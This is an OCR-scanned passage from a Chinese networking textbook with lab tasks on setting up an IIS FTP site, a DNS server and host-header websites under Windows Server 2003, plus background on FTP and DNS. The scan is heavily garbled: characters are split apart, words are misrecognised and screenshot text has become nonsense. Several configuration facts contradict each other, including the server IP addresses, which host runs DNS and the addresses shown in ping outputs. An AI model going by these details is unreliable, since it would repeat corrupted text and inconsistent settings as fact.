微软 Windows Server 2003 集成 互联 网 信息 服务 IIS 可 以 用 于 发 布 和 管理 FTP 站 点 ， 


@ 目前 ,网 络 入 侵 大 都 是 通过 动态 页 面 的 人 侵 , 攻 击 者 通过 提交 不 恰当 数据 库 查询 请 求 获得 敏感 信息 ,如 扫描 数 
据 库 后 台 系 统管 理 员 账 号 和 密码 ,从 而 臭 改 主页 、 上 传 木马 . 盗 取 服 务 器 数据 等 。 
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主机 2 教师 客户 机 
IP: 192.168.1.20 
Mack : 255.255.255.0 


主机 3 学 生 客户 机 
主机 1 FTP Server IP: 192.168.2.20 


人 Mack : 255.255.255.0 
Gateway : 192.168.1.1 ”网 卡 1 1 网 卡 2 Gateway ，192.168.2.1 
IP: 192.168.1.1 | IP: 192.168.2.1 
Mack : 255.255.255.0| Mack : 255.255.255.0 
1 
E 机 名 称 | 担任 角色 操作 系统 IP 地 址 。 | ”网关 


网 卡 2: 192.168.2.1 
主机 2 | 教师 客户 机 Windows XP 192.168.1.20 | 192.168.1.1 


主机 3 | 学 生 客户 机 | Windows XP 192.168.2.20 


主机 1 | FTP 服 务 器 |Windows Server 2003 | 网 卡 1: 192.168.1.1 | 


192.168.2.1 


图 7-15 工作 任务 八 的 工作 环境 拓扑 图 
通过 文件 传输 协议 实现 文件 的 上 传 和 下 载 服务 。 
工作 过 程 
1. 安装 IIS 中 FTP 服务 
IIS 默认 不 安装 FTP 服务 以 避免 恶意 攻击 。 启 动 主 机 1 进入 Windows 2003, 在 
Windows 组 件 向 导 中 ,选择 "应 用 程序 服务 器 ?选项 并 单 击 * 详 细 信 息 ” 按 钮 ,在 弹出 的 
“Internet 信息 服务 (IIS)” 对 话 框 中 单 击 “ 详 细 信 息 " 按 钮 并 选中 “文件 传输 协议 (FTP) 服 务 ” 
选项 ,如 图 7-16 所 示 。 在 安装 过 程 中 ,同样 会 提示 插入 Windows 2003 安装 盘 , 根 据 向 导 完 
成 安装 。 
x 


a 可 4 
Internet 信息 服务 CTS) 的 子 姐 件 吕 ): 

口 WIP Service 
口 seasMTP Service 
回 移 公 用 文件 

口 多 后台 智能 传送 服务 (BITS) 服务 器 扩展 
= 网 月 


加 全 文件 传 入 协议 FTP) 服 务 


描述 为 外 娃 用 于 上 载 和 下 载 文件 的 FTF 站 点 提供 支持 。 


所 需 磁 盘 宝 间 15.0 ImB 洋 骨 信息 0) 
可 用 暴乱 空间 : 6006.3 加 | 


Cm | | 


图 7-16 安装 FTP 服务 
2. 新 建 FTP 站 点 


(1) 在 C 盘 新 建 “^FTP 服务 "文件 夹 ,其 内 建立 “资源 上 传 " 和 “资源 下 载 ” 两 个 子 文件 
夹 (可 在 “资源 下 载 ” 文 件 夹 内 新 建 ppt 文件 作为 下 载 测试 )。 
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(2) 启动 IIS ,选择 开始 ”所 有 程序 ”一 ”管理 工具 ”Internet 信息 服务 管理 器 ” 命 
令 , 弹 出 “Internet 信息 服务 (IIS) 管 理 器 "配置 窗口 。 右 击 "FTP 站 点 ?选项 并 选择 "新 建 " 一 
“FTP 站 点 ”命令 ,如 图 7-17 所 示 ,弹出 "FTP 站 点 创建 向 导 ” 对 话 框 。 


由 Internet 信息 服务 (TTS) 管 理 器 


户 建 FTP 站 点 | | 


图 7-17 新 建 FTP 站 点 


(3) 进入 "FTP 站 点 描述 ”对 话 框 ,在 “描述 "文本 框 中 输入 站 点 名 称 以 便 管理 员 识 别 和 
管理 多 个 FTP 站 点 ,如 输入 “教学 资源 站 点 ”, 如 图 7-18 所 示 。 


FTP 站 点 创建 育 导 Lx 
FT 站 点 其 述 SS 
FIP 站 点 描述 用 于 帮助 管理 员 识别 各 个 站 点 。 


输入 FTP 站 点 的 描述 。 
描述 号); 


FE 


《上 一 步 @ | 下 一步 中 > 取消 


图 7-18 定义 FTP 站 点 描述 


(4) 单 击 “ 下 一 步 ” 按 钮 进入 “IP 地 址 和 端口 设置 ?对 话 框 ,在 “站 点 IP 地 址 ?下 拉 列 表 中 
选择 服务 器 主机 1 的 IP“192. 168. 1. 1”, 在 “输入 此 FTP 站 点 的 TCP 端口 ”中 不 要 改变 
FTP 默认 的 端口 号 21, 如 图 7-19 所 示 。 

(5) 单 击 “下 一 步 ?按钮 进入 "FTP 用 户 隔离 对话 框 , 采 用 默认 * 不 隔离 用 户 ”。 

(6) 单 击 “ 下 一 步 ” 按 钮 进入 “FTP 站 点 主 目录 ?对话 框 , 单 击 “浏览 ?按钮 并 选择 FTP 根 
目录 路 径 , 或 直接 在 “路 径 ” 文 本 框 中 输入 路 径 %*C:\FTP 服务 ”, 如 图 7-20 所 示 。 

(7) 单 击 “ 下 一 步 ” 按 钮 进入 *FTP 站 点 访问 权限 ”对 话 框 ,允许 * 读 取 ” 和 “ 写 入 ”权限 ,如 
图 7-21 所 示 。 
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7-21 定义 FTP 站 点 访问 权限 
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(8) 配置 双 权 限 。 车 “FTP 服务 ”文件 夹 所 在 C 盘 是 NTFS 格式 分 区 , 则 需要 配置 文件 

访问 权限 。 右 击 *FTP 站 点 ”文件 夹 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,在 弹出 的 对 话 

框 中 选择 “安全 ”选项 卡 并 添加 “IUSR_ 主 机 1” 账 号 ,并 赋予 其 “ 读 取 ”和 “ 列 出 文件 夹 目 录 ” 
权限 ,如 图 7-22 所 示 。 


| 
常规 | 共享 ”安全 eb 共享 | 自 定义 | 
姐 或 用 户 名 称 @@) 
@ Adninistrator (主机 I\Adninistrator) 


轩 Internet 来 宾 账 户 (主机 1\IUSR 主机 1) 


: 
: 


[sa 
EE 


完全 控制 
修改 


读 职 和 运行 
列 出 文件 夹 目录 
读 职 


rT 


1Oooooo 悦 


口 
口 
Oo 
回 
9 


加 | 
特别 权限 职高 胡 设置 ,请 单 证 “高 大" 。 。 高 加 | 


图 7-22 添加 主 目录 访问 权限 


由 于 “资源 上 传 "文件 夹 隶属 于 "FTP 站 点 ? 子 文 件 夹 ,会 继承 其 父 文件 夹 所 有 权限 。 为 
实现 资源 上 传 功能 ,必须 在 “资源 上 传 ”文件 夹 添加 “ 写 入 "权限 。 右 击 “ 资 源 上 传 ” 文 件 夹 ， 
选择 “属性 ”命令 ,在 弹出 的 对 话 框 中 选择 “安全 ”选项 卡 , 在 “Internet 来 宾 账 号 (IUSR_ 主 机 
1)” 权 限 中 添加 “ 写 入 ”权限 ,如 图 7-23 所 示 。 


耻 x| 
常规 | 共享 安全 | reb 共享 | 自 定义 | 
姐 或 用 户 名 称 G) 
Adninistrator (主机 1\Adninistrator) 


轩 Internet 来 宾 账户 (主机 1\IUSR 主机 1) 


完全 控制 
修改 


读 取 和 运行 
列 出 文件 夹 目录 


图 7-23 添加 写 入 权限 
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3. 配置 站 点 属性 

(1) 此 时 ,在 FTP 站 点 目录 中 会 出 现 新 建 的 “教学 资源 站 点 ”, 右 击 “ 教 学 资源 站 点 ” 选 
项 ,选择 “属性 ”命令 ,进行 站 点 属性 配置 。 

(2) 现 禁止 学 生 网 段 192. 168. 2. 0 对 访问 该 站 点 。 选 择 “ 目 录 安 全 性 ”选项 卡 , 选 中 “ 授 
权 访 问 " 单 选 按钮 ,并 单 击 “ 下 面 列 出 的 除外 ”列表 框 “添加 ”按钮 ,在 弹出 的 对 话 框 中 选中 “一 
组 计算 机 ” 单 选 按钮 ,输入 网 络 标识 “192. 168. 2. 0” 和 对 应 子 网 掩 码 “255. 255. 255. 0”, 如 
图 7-24 所 示 。 


EEITTAITEREEE 本 对 
FTP 站 点 | 安全 账户 | 消息 “| 主 目录 目录 安全 性 | 
FTCPIP 地 址 访 | 


问 限制 
默认 情况 下 ， 所 有 计算 机 都 格 被 :| 57 (5 授权 访问 到 ) 


下 面 列 出 的 除外 : 国王 拒 引 访问 中 


图 7-24 限制 学 生 网 段 了 


4. 实验 结果 测试 

(1) 在 对 主机 2 和 主机 3 配置 网 关 后 ,都 能 ping 通 主机 1 的 IP*192. 168. 1.10”。 

(2) 启动 主机 2 教师 端 浏览 器 ,输入 “ftp://192. 168. 1. 10? 访 问 主机 1 发 布 的 FTP 站 
点 ,并 可 以 在 “资源 上 传 "文件 夹 中 上 传 文件 及 文件 夹 。 

(3) 启动 主机 3 学 生 端 浏览 器 ,输入 “ftp://192. 168. 1. 10? 发 现 不 能 访问 主机 1 发 布 的 
FTP 站 点 ,提示 “登录 ”对 话 框 ,如 图 7-25 所 示 。 


门 Rp://192,168.1.1/ - Mi 


[a “之 服务 器 不 区 许 匿名 登录 ,或 者 不 接受 该 电子 邮件 地 址 。 


图 7-25 主机 3 不 能 访问 FTP 站 点 
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任务 总 结 着 


(1) 若 FTP 站 点 目录 是 NTFS 格式 分 区 , 则 发 布 站 点 也 会 存在 双 权 限 问 题 。 

(2) 在 IIS 中 ,访问 Web 站 点 和 FTP 站 点 默认 账号 都 是 "IUSR_ 主 机 名 ”。 若 要 启用 用 
户 名 和 密码 认证 , 则 用 户 名 和 密码 必须 是 操作 系统 用 户 名 和 密码 ,不 能 自 定义 ,存在 安全 
问题 。 


:知识 拓展 


FTP(File Transfer Protocol) 文 件 传 输 协议 工作 于 TCP/IP 参考 模型 的 应 用 层 , 是 最 早 
应 用 于 主机 之 间 文 件 传输 的 标准 之 一 。FTP 采用 TCP 传输 控制 协议 传输 数据 ,由 于 TCP 
是 一 种 面向 连接 的 可 靠 传 输 协议 ,这 也 保证 了 FTP 文件 传输 的 可 靠 性 。 

1. FTP 数据 连接 模式 

FTP 服务 启用 21 端口 作为 监听 端口 ,用 于 发 送 和 等 待 服务 器 响应 ,协调 双方 主机 建立 
TCP 连接 ,也 被 称 为 连接 端口 ; 另 一 个 是 数据 传输 端口 ,用 于 建立 数据 传输 通道 。 然 而 , 具 
体 使 用 哪个 端口 号 作为 数据 传输 端口 取决 于 FTP 服务 连接 方式 。FTP 有 两 种 连接 方式 ， 
分 别 是 PORT 模式 和 PASV 模式 。PORT 模式 是 端口 模式 ,也 被 称 为 主动 模式 ; 而 PASV 
模式 是 被 动 模式 了。 

在 主动 模式 下 ,FTP 控制 连接 方向 和 数据 连接 方向 是 相反 的 。 客 户 端 向 服务 器 FTP 
连接 端口 (默认 是 21) 发 送 建立 控制 链 路 以 配合 数据 传输 请 求 。FTP 服务 器 收 到 后 使 用 20 
端口 作为 数据 传输 端口 ,主动 向 客户 端 发 送 连接 请 求 建立 数据 链 路 ,相当 于 客户 端 说 “我 打 
开 了 20 数据 传输 端口 ,你 主动 过 来 连接 我 ”。 在 建立 数据 链 路 过 程 中 ,服务 器 主动 向 客户 端 
发 送 数据 连接 请 求 ,因此 被 称 为 主动 模式 。 

在 被 动 模式 下 ,FTP 控制 连接 方向 和 数据 连接 方向 是 一 致 的 。 客 户 端 向 服务 器 连接 端 
口 (默认 是 21) 发 送 请 求 , 服 务 器 接受 连接 ,建立 一 条 控制 链 路 ,并 打开 一 个 临时 端口 (1024 一 
65535) 响 应 客户 端 发 出 的 数据 连接 请 求 , 相 当 于 服务 器 说 “我 打开 了 某 数 据 传输 端口 ,你 过 
来 连接 我 ”。 当 传送 数据 时 ,客户 端 向 服务 器 该 端口 发 送 连接 请 求 , 建 立 数据 链 路 传送 数据 。 
在 建立 数据 链 路 的 过 程 中 ,服务 器 被 动 等 待 客户 端 连 接 请 求 ,因此 被 称 为 被 动 模式 。 

在 同一 局 域 网 中 ,FTP 协议 的 主动 模式 和 被 动 模式 都 可 以 正常 传输 数据 。 然 而 ,在 广 
域 网 中 ,由 于 存在 防火 墙 限制 , 故 FTP 只 能 使 用 被 动 模式 传输 数据 。 因 为 防火 墙 用 于 隔离 
内 网 和 外 网 ,允许 内 网 用 户 连接 外 网 ,禁止 外 网 用 户主 动 连接 内 网 ,所 以 对 内 网 用 户 起 到 保 
护 作 用 。 由 于 防火 墙 会 阻止 外 网 FTP 服务 器 向 内 网 发 出 的 20 端口 连接 请 求 ,因而 此 时 
FTP 数据 链 路 建立 必须 使 用 被 动 模式 。 

2. FTP 数据 传输 模式 

FTP 数据 传输 模式 有 两 种 ,分 别 是 ASCII 模式 和 Binary( 二 进 制 ) 模 式 。 文 本 文件 字符 
遵循 ASCII 定义 , 既 可 以 使 用 ASCII 模式 传输 ,也 可 以 使 用 二 进 制 模式 传输 ; 非 文本 文件 
被 称 为 二 进 制 文件 ,不 遵循 ASCII 定义 ,因此 不 能 通过 ASCII 模式 传输 ,否则 传输 后 会 导致 


@ 这 里 所 说 的 主动 与 被 动 都 是 相对 于 服务 器 而 言 。 
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数据 不 可 识别 。 

另外 ,使 用 二 进 制 传输 模式 效率 高 于 ASCII 传输 模式 。 当 客户 端 连接 FTP 服务 器 时 ， 
虽然 可 以 指定 使 用 何 种 传输 模式 ,但 服务 器 为 提高 传输 效率 ,通常 会 禁用 ASCI 传输 。 此 
时 ,即使 客户 端 指定 使 用 ASCII 传输 方式 ,实际 传输 时 仍 为 二 进 制 模式 。 


7.3 DNS 域名 系统 


工作 任务 九 配置 域名 服务 


工作 目的 

安装 和 配置 DNS 服务 。 

工作 任务 

小 张 是 学 校 网 管 中 心 人 员 ,图 书馆 新 购置 了 两 个 服务 器 : 一 个 作为 Web 服务 ,以 供 学 
生 在 线 借阅 书籍 ; 一 个 作为 FTP 服务 ,用 于 提供 电子 书籍 和 资源 下 载 。 为 方便 学 生 访 问 ， 
小 张 需 对 服务 器 配置 域名 服务 。 

工作 环境 和 工具 

工作 任务 九 的 工作 环境 拓扑 图 如 图 7-26 所 示 , 工 具 和 录像 可 在 http://www. gdcp. cn/ 
jpkc/lf 中 下 载 。 

1 主机 1: DNS 服务 器 


IP: 192.168.1.254 
Mask : 255.255.255.0 


分 


主机 2 : 图 书馆 Web 服 务 器 主机 3 : 图 书馆 FTP 服 务 器 


域名 : www.gdcp.cn 域名 : ftp.lib.gdcp.cn 

IP: 192.168.1.20 十 机 客机， IPY 192.168.1.30 

Mask : 255.255.255.0 Wd ss 0 Masks 2552352550 
DNS : 192.168.1.254 

主机 名 称 | ”担任 角色 操作 系统 IP 地 址 域名 


主机 1 | DNS 服务 器 |Windows Server 2003 |192.168.1.254 


主机 3 | FTP 服 务 器 “|Windows Server 2003 | 192.168.1.30 |ftp.lib.gdcp.cn 


| 主机 2 | Web 服 务 器 |Windows Server 2003 | 192.168.1.20 |www.lib.gdcp.cn 


主机 4 | 客户 机 Windows XP 192.168.1.40 


图 7-26 工作 任务 九 的 工作 环境 拓扑 图 


DNS 定义 和 功能 如 下 。 
DNS 域名 系统 用 于 IP 地 址 和 域名 的 相互 转换 。 当 浏览 服务 器 Web 站 点 时 ,必须 知道 
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服务 器 IP, 例 如 ,广东 交通 职业 技术 学 院 Web 服务 器 IP 为 “110. 64. 98. 8”, 要 浏览 其 站 点 必 
须 在 浏览 器 上 输入 “http://110. 64.98. 8”。 由 于 IP 纯 数字 化 地 址 难以 记忆 , 兼 之 当 服 务 器 
IP 变更 时 客户 端 也 要 做 相应 更 改 , 这 会 对 客户 造成 不 便 , 因 此 提出 对 IP 地 址 起 名 以 方便 记 
忆 , 即 域名 。 域 名 格式 为 *…. 三 级 域名 . 二 级 域名 . 顶级 域名 ”。 例 如 学 校 域名 为 “gdcp. cn”， 
只 需 在 地 址 栏 输 入 “http://www. gdcp. cn” 即 可 访问 学 校 站 点 。 其 中 ,www 是 主机 名 ,表示 
是 提供 网 页 服务 的 Web 服务 器 ; gdcp. cn 是 域名 ; cn 是 国家 顶级 域名 ,表示 中 国 。 

工作 过 程 

1. 配置 主机 2 的 Web 服务 

在 主机 2 配置 Web 服务 ,IP 地 址 为 192. 168. 1. 20 ,端口 号 为 80 ,图 书馆 主页 文件 可 在 
http://www. gdcp. cn/jpkc/lf 中 下 载 。 

2. 配置 主机 3 的 FTP 服务 

在 主机 3 配置 FTP 服务 ,IP 地 址 为 192. 168. 1. 30 ,端口 号 为 21 ,可 新 建 ppt 文档 以 供 
下 载 测试 。 

3. 在 主机 3 安装 DNS 服务 

Windows 2003 系统 默认 不 安装 DNS 服务 。 启 动 主 机 3 进入 Windows 组 件 向 导 , 在 
“网 络 服务 ”对 话 框 中 单 击 “ 详 细 信 息 ” 按 钮 ,并 在 其 组 件 列表 中 选中 “域名 系统 (DNS)” 选 
项 ,如 图 7-27 所 示 , 根 据 向 导 完 成 域名 系统 服务 安装 。 

EE 

2 


口 

口 加 Internet 验证 服务 
口 加 Windors Internet 名 称 服务 YINS) 0.9 MB 
口 加 动态 主机 配置 协议 OHCP) oom 
口 思科 各 


描述 。 安装 DNS 服务 器 响应 对 DRS 名 称 的 查询 和 更 新 的 请 求 。 


所 需 磁 条 空间: 3.4 上 洋 阴 信息 0) 
可 用 磁盘 空间 


5996.9 有 
上 we | 
图 7-27 安装 DNS 服务 


4. 在 主机 3 新 建 DNS 区 域 

(1) 选择 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ”->“DNS” 命 令 启 动 DNS 服务 , 右 击 * 正 向 
查找 区 域 ” 选 项 并 选择 “新 建 区 域 "命令 ,进入 “新 建 区 域 向 导 ” 界 面 。 

(2) 单 击 “ 下 一 步 ” 按 钮 ,在 “区 域 类 型 "下 拉 列 表 中 选择 “主要 区 域 ”。 

(3) 单 击 “ 下 一 步 ” 按 钮 ,在 “区 域名 称 ” 文 本 框 输入 主机 2 图 书馆 Web 站 点 域名 “lib. 
gdcp. cn”, 如 图 7-28 所 示 。 其 中 “gdcp. cn” 是 学 校 向 电信 注册 的 二 级 域名 ,“lib” 是 图 书馆 
向 学 校注 册 的 三 级 域名 。 继 续 单 击 * 下 一 步 ?按钮 用 默认 选项 完成 新 建 区 域 向 导 。 

5. 在 主机 3 配置 区 域 属性 

(1) 当 完 成 新 建 区域 向 导 后 ,在 “ 正 向 搜索 区 域 " 列 表 中 会 出 现 新 建 的 “lib. gdcp. cn” 区 
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EE 
区 域名 称 3 
新 区 域 的 各 称 是 什么 ? J 
区 入 旷 下 Se 这 可 能 是 侨 组 织 单 
2 microsoft, com 下 
newzone -microsoft con)。 此 区 | DRS 称 。 
区 域名 称 名) : 
hiv scp 
有 关 区 域名 称 的 详细 信息 ， 请 音 击 “帮助 ”。 


<t-swTSm)] mw | ww | 
图 7-28 输入 区 域名 称 


域 。 选 中 此 区 域 , 右 击 并 选择 “新 建 主机 "命令, 在“ 名称” 文本 框 中 输入 Web 服务 器 主机 名 
“www”0, 并 会 看 到 完全 合格 域名 为 “www. lib. gdcp. cn”; 在 IP 地 址 栏 中 填写 主机 2 的 IP 
“192. 168. 1. 20”, 单 击 “ 添 加 主机 ”按钮 创建 一 条 域名 记录 ,如 图 7-29 所 示 。 此 时 ,主机 2 服 
务 器 域名 为 “liB. gdcp. cn”, 对 应 IP 是 “192. 168. 1. 20”。 

(2) 用 同样 方法 配制 主机 3 域名 ,新 建 主机 名 称 为 "ftp”,IP 地 址 是 主机 3 IP*192. 168. 1. 30”， 
创建 主机 3 域名 记录 ,如 图 7-30 所 示 。 


图 7-29 配制 主机 2 域名 图 7-30 配制 主机 3 域名 


6. 实验 测试 

(1) 测试 DNS 服务 是 否 配制 正确 。 在 主机 4 客户 端 配置 IP 地 址 和 首选 DNS 服务 器 
后 ,在 命令 模式 下 分 别 输入 “ping www. lib，gdcp. cn” 和 “ping ftp. lib. gdcp. cn”, 发 现 可 
以 连通 ,系统 自动 把 域名 转换 为 对 应 IP, 如 图 7-31 所 示 。 

(2) 在 主机 4 浏览 器 中 输入 “htt://www. lib. gdcp. cn” 可 以 访问 图 书馆 Web 站 点 。 

(3) 在 主机 4 浏览 器 中 输入 “ftp://ftp. lib. gdcp. cn” 可 以 访问 图 书馆 FTP 站 点 。 


@ 常用 主机 名 有 www.ftp、mail 等 ,假如 随意 输入 不 规范 主机 名 ,例如 为 aaa, 则 客户 端 访问 地 址 为 ~http://aaa. 
liB. gdcp. en", 这样 只 会 造成 不 便 。 
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EE 


fC: ping www-lib-gdcp-cn ~ 
Pinging| www-lib-gdcp-cn [192.168.1.28] with 32 bytes of data: 中 


ply fron 192.168.1.29: bytes-32 tine=ins TIL=128 
了 from 192.168.1.20: bytes=32 tine<ims TIL=128 
ply fron 192.168.1.28: hytes=32 tineCinms TTL=128 
Reply fron 192.168.1.28: bytes=32 tine=l5ms TIL=128 


Ping statistics for 192.168.1.20: 

Packets: Sent = 4, Received = 4, Lost = @ (@x loss), 
jhpproximate round trip tines in nilli-seconds: 

Minimun = Gns, Maxinun = iS5ms, fverage = 4ns 


:VYping ftp.1ib.gdcp.cn 


jPinging| ftp-lib-gdcp-cn [192.168.1.39] with 32 bytes of data: 


ply fron 192.168.1.30: hytes=32 tine=ins TIL=128 
ply fron 192.168.1.30: bytes=32 tineCins TTL=128 
ply fron 192.168.1.30: bytes=32 tine<ins ITL=128 
ply from 192.168-1-39: bytes=32 tineCins TTL=128 
Ping statistics for 192.168.1.38: 
Packets: Sent = 4, Received = 4, Lost = 日 (Gx loss), 
Approxinate round trip tines in milli-seconds: 
Minimun = Gns, Maxinun = lms。 fverage = Qns 


图 7-31 测试 DNS 域名 是 否 配 制 正确 


任务 总 结 着 


(1) DNS 域名 系统 中 的 正 向 查找 区 域 用 于 将 域名 转换 为 IP 地 址 , 反 向 查找 区 域 用 于 将 
IP 地 址 转换 为 域名 。 由 于 客户 在 浏览 器 地 址 栏 中 输入 的 是 域名 ,需要 将 域名 转换 为 IP 地 
址 ,因此 创建 域名 系统 是 需要 使 用 正 向 查找 区 域 。 

(2) 域名 系统 中 的 主机 名 不 可 随意 定义 。 主 机 名 要 与 服务 器 提供 的 服务 相 匹 配 。 例 
如 ,提供 Web 服务 的 主机 名 为 “WWW”, 提 供 FTP 服务 的 主机 名 为 "FTP”, 提 供 邮件 服务 
的 主机 名 为 "Mail"。 这 些 主机 名 与 IIS 服务 中 的 默认 访问 账号 TUSR_ 主 机 名 ”中 的 主机 名 
是 两 个 概念 。 


工作 任务 十 通过 域名 服务 发 布 多 个 站 点 


工作 目的 

在 IIS 服务 中 发 布 多 个 Web 站 点 。 

工作 任务 

小 张 是 学 校 网 管 中 心 人 员 , 现 有 多 个 院 系 需要 发 布 站 点 。 为 减少 设备 成 本 ,小 张 打算 在 
学 校服 务 器 上 结合 DNS 服务 同时 发 布 多 个 Web 站 点 。 

工作 环境 和 工具 

工作 任务 十 的 工作 环境 拓扑 图 如 图 7-32, 工 具 和 录像 可 在 http://www. gdcp. cn/jpkc/ 


中 下 载 。 


工作 过 程 
1. 下 载 网 站 文件 


在 主机 2 下载 3 个 院 系 需要 发 布 的 网 站 文件 ,可 在 http://www. gdcp. cn/jpke/H 下 
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交换 机 


主机 2 Web 服 务 器 主机 3 客户 机 

IP: 192.168.1.20 S IP: 192.168.1.30 
Mask : 255.255.255.0 Mask : 255.255.255.0 
主机 1 DNS 服务 器 DNS : 192.168.1.254 
IP: 192.168.1.254 


Mask : 255.255.255.0 


主机 名 称 


担任 角色 操作 系统 IP 地 址 域名 
主机 1 | DNS 服 务 器 |Windows Server 2003 | 192.168.1.254 


Www.computer.com 


i 2. Www.chinese.com 
Web 服 务 器 | Windows Server 2003 | 192.168.1.20 Ww bls on 


| 
| 
主机 2 
| 


主机 3 | 客户 机 Windows XP 192.168.1.30 


图 7-32 工作 任务 十 的 工作 环境 拓扑 图 


载 ,文件 夹 名 称 分 别 为 computer、chinese 和 physcis@ ,主页 文件 均 为 “index. htm”。 

2. 创建 www. computer. com 站 点 

启动 主机 2 的 IIS 服务 ,利用 “网 站 创建 向 导 " 新 建 第 一 个 Web 站 点 ,描述 为 “计算 机 
学 院 ”, 站 点 IP 为 “192. 168.1. 10”,TCP 端口 号 用 默认 “80”, 在 主机 头 中 输入 "www. 
computer. com”, 如 图 7-33 所 示 , 单 击 * 下 一 步 ? 按 钮 按照 向 导 完 成 站 点 发 布 。 

3. 创建 其 余 两 个 站 点 

用 上 述 方法 依次 发 布 其 余 “www. chinese. com” 和 “www. physcis. com” 站 点 ,主机 头 和 
站 点 域名 相同 。 

4. 为 站 点 1 配置 域名 

启动 主机 1 DNS 服务 配置 界面 , 右 击 “ 正 向 查找 区 域 ”新 建 “*computer. com” 区 域 ,并 在 
区 域内 新 建 主 机 ,主机 名 称 为 “~www”, 对 应 IP 为 "192. 168. 1. 10”, 如 图 7-34 所 示 。 


图 7-33 创建 www. computer. com 站 点 图 7-34 为 站 点 1 配置 DNS 域名 服务 


@ ”发布 站 点 的 文件 夹 名 称 最 好 不 要 用 中 文 , 否 则 会 遇 到 很 多 意 想不到 的 问题 。 
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5. 为 其 余 站 点 配置 DNS 域名 


用 上 述 方法 在 主机 1 新 建 “chinese. com” 和 “physcis. com” 两 个 区 域 并 添加 主机 ,为 其 


余 两 个 站 点 配置 域名 ,如 图 7-35 所 示 。 


\physcis. com] 


二 型 
站 CRXPER) 起 让 失 权 机 条 GUN [1]， 主 机 1 ， 
中 轩 二 文件 到 相同 ) 名 称 服务 器 0) #1. 
ee 国 mm 主机 OW) 192. 168, 1.20 
时 纳 害 而 
图 7-35 为 其 余 站 点 配置 域名 


6. 实验 测试 


(1) 测试 DNS 域名 服务 是 否 配制 正确 。 在 主机 3 客户 端 配置 IP 地 址 和 首选 DNS 服 
务 器 后 ,在 命令 模式 下 分 别 输入 "ping www. computer. com”、“ping www. chinese. com” 和 
“ping www. physcis. com”, 发现 可 以 连通 ,系统 自动 把 3 个 不 同 域名 转换 为 同一 IP 


“192. 168. 1. 20”, 如 图 7-36 所 示 。 


with 32 bytes of data: 
TIL=128 
TIL=128 
ITIL=128 
TIL=t28 


inging [wuw.conputer.con [192.168-1.29] 
ply from 192.168.1.20: bytes=32 tineCims 
eply from 192.168.1 bytes=32 tine<lms 
eply fron 192.168.1.20: bytes-32 tine<lms 
eply fron 192.168.1.20: hvtes=32 tineCims 
ing statistics for 192.168.1.29: 

Packets: Sent = 4。 Received = 4。Lost = 8 《Bx loss), 
pproxinate round trip tines in milli-seconds: 

Mininun = Gns, Maxinun = Bns, fverage - Ons 
: Vping wwu.chinese.com 
inging |www-chinese-com [192.168.1.28] 


with 32 hytes of data: 


eply from 192.168.1.20: bytes=32 tineCims TTL=128 
eply from 192.168.1.28: bytes=32 tine<inms TIL=128 
eply from 192.168.1.28: bytes=32 time<lms TIL=128 
eply from 192.168-1-29: bytes=32 time<lms TIL=128 


ing statistics for 192.168.1.28: 
Packets: Sent = 4。 Received = 4。 Lost = @ (@x loss),. 
pproxinate round trip times in nilli-seconds: 
Minimum = Bns, Maximum = Bms, fverage = Bns 
:Vping www.physcis.com 
inging | www-physcis -com [192.168.1.28] 


with 32 bytes of data: 


eply from 192.168.1.2| ytes=32 tineCins TIL=128 
ply from 192.168.1.2 ytes=32 time<lms TIL=128 
ply from 192.168.1.2 ytes=32 time<lms TIL=128 
ply from 192.168.1.280: bytes=32 tine<ins TIL=128 


ing statistics for 192.168.1.20: 
Packets: Sent = 4。 Received = 4,. Lost - 日 《Bx loss), 
pproxinate round trip tines in milli-seconds: 
Mininun = Bns, Maxinun = Bns, fverage = Gns 


图 7-36 测试 DNS 是 否 配 制 正确 


(2) 在 主机 3 浏览 器 中 输入 地 址 “www. computer. com”, 可 以 访问 计算 机 系 主 页 。 
(3) 在 主机 3 浏览 器 中 输入 地 址 “www. chinese. com” 可 以 访问 中 文系 主页 。 
(4) 在 主机 3 浏览 器 中 输入 地 址 ”www. physcis. com” 可 以 访问 物理 系 主 页 。 
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任 甸 总 结 库 


一 个 服务 可 以 通过 IIS 同时 发 布 多 个 网 点 ,但 每 个 网 点 必须 有 唯一 标识 。 一 个 网 站 标 
识 由 IP 地址 .TCP 端口 号 和 主机 头 三 部 分 组 成 ,只 要 更 改 其 中 一 项 即 可 为 多 个 网 站 创建 唯 
一 标识 。 

(1) 利用 不 同 IP 地 址 发 布 多 站 点 。 当 利用 不 同 IP 地 址 发 布 多 个 站 点 时 ,要 求 每 个 站 
点 有 唯一 静态 IP。 车 创建 个 站 点 , 则 需要 个 IP。 虽然 一 个 网 卡 可 以 配置 多 个 IP, 但 此 
种 方法 会 浪费 大 量 IP 地 址 ,还 会 降低 路 由 器 和 Web 服务 器 性 能 。 

(2) 利用 不 同 端口 号 发 布 多 站 点 。Web 服务 默认 TCP 端口 号 是 80, 若 利用 非 标准 
TCP 端口 号 发 布 多 个 站 点 , 则 用 户 必须 知道 指派 给 不 同 站 点 所 对 应 的 具体 端口 号 。 例 如 ， 
其 中 一 个 站 点 使 用 8001 端口 作为 标识 ,用 户 必须 在 浏览 器 中 输入 “http://www. computer. 
com:8001” 访 问 ,这 也 会 给 用 户 带 来 不 便 。 

(3) 利用 不 同 主机 头发 布 多 站 点 。 在 服务 器 发 布 多 个 站 点 时 ,推荐 配置 主机 头 方式 发 
布 ,IIS 通过 不 同 主机 头 名 称 响 应 客户 浏览 器 请 求 , 但 这 种 方法 必须 结合 DNS 域名 解析 服 
务 , 例 如 本 例 。 


知识 拓展 

Internet 通过 IP 地 址 标识 网 络 主机 和 设备 。 由 于 纯 数 字 IP 地 址 用 户 难以 记忆 和 使 
用 ,为 解决 这 一 问题 ,需要 一 种 主机 命名 体系 用 于 将 主机 名 称 转 换 为 IP 地 址 ,分 别 是 WINS 
网 络 名 称 服务 和 DNS 域名 系统 。 

WINSCWindows Internet Name Server) 网络 名 称 服 务 为 NetBIOS@ 提供 名 称 注 册 、 更 
新 、 释 放 服 务 , 并 将 主机 名 称 解 析 为 IP 地 址 。 客 户 端 通过 单 播 方式 向 WINS 服务 器 查询 
NetBIOS 名 称 所 对 应 IP 地 址 ,会 产生 大 量 数据 堵塞 带宽 , 故 它 适 用 于 通过 主机 名 称 查 找 局 
域 网 中 的 计算 机 。 

DNS(Domain Name System) 域 名 系统 是 一 种 层次 结构 化 命名 机 制 , 用 于 将 用 户 指定 域 
